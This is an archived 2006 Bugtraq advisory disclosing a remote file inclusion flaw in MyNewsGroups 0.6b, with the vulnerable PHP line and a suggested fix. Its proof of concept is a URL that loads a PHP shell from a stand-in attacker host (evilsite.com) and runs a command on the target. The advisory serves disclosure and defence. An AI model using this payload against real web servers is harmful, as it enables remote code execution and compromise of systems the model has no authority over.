lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060731213252.16018.qmail@securityfocus.com>
Date: 31 Jul 2006 21:32:52 -0000
From: philipp.niedziela@....de
To: bugtraq@...urityfocus.com
Subject: MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability

+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Venedor ...........: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at telug dot
it)
+
+ require_once $myng_root."/pear/PEAR.php";
+ .....
+
+--------------------------------------------------------------------
+
+ $myng_root is not properly sanitized before being used.
+ The bug is in the "PHP Layers Menu 2.3.5" Package for MyNewsGroups.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $myng_root ="bla/bla" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/pear/PEAR.php/index.html
+
+
http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P
EAR.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ